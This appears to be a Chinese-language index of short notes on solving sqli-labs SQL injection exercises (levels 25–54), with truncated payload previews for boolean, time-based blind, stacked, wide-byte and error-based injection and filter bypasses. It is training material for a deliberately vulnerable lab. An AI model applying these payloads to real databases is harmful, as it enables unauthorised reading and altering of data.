林阿饭

less-54 ?id=1 and 1=1 -- qwe ?id=1 and 1=2 -- qwe ?id=1 'and 1=1 -- qwe ?id=1 'and 1=2 -- qwe ?id=1

less-48 与47关类似，但报错注入无回显，使用时间盲注?sort=2 and and if(length(database())>100,sleep(5),1) 左上角处于加载，一步步推断条件

less-42 很像之前的二次注入，之前的方法是注册一个账号通过修改密码来修改另一个账号的密码，本题中没有注册，可以使用堆叠注入，第一步尝试闭合，username栏不行，password栏输入'or

less-38 可以正常做法，但源码中存在mysqli_multi_query函数，存在堆叠注入 ?id=1';insert into users(id,username,password)value

less-34 汉' or 1=1 -- qwe 汉' order by 2 -- qwe 汉' union select 1,2 -- qwe 汉' union select 1,database(

less-32 ?id=1%df%27%20and%201=1%20--%20wqe闭合 ?id=1%df%27%20order%20by%203%20--%20wqe ?id=-1%df%27%20

less-27 本关提示无法使用联合查询，第一步尝试闭合，查看结果空格，注释被蔽掉 %0a代替空格，?id=1'%0Aand%0A1=1%0Aor%0A'1'='1 ?id=1'%0Aand%0Aup

** less-26** 单引号报错，看提示可以发现过滤掉了and，or，注释，空格 用两个单引号，后一个单引号闭合后面的单引号 可以使用 updatexml() 报错注入，因为这种手法不需要考虑空格

less-25 观察提示or and 无法使用，输入and，发现被代替 and无法使用，可以使用&&符号，注意在url栏里需要url编码，不然无法使用 ?id=1' %26%26 1=1 -- we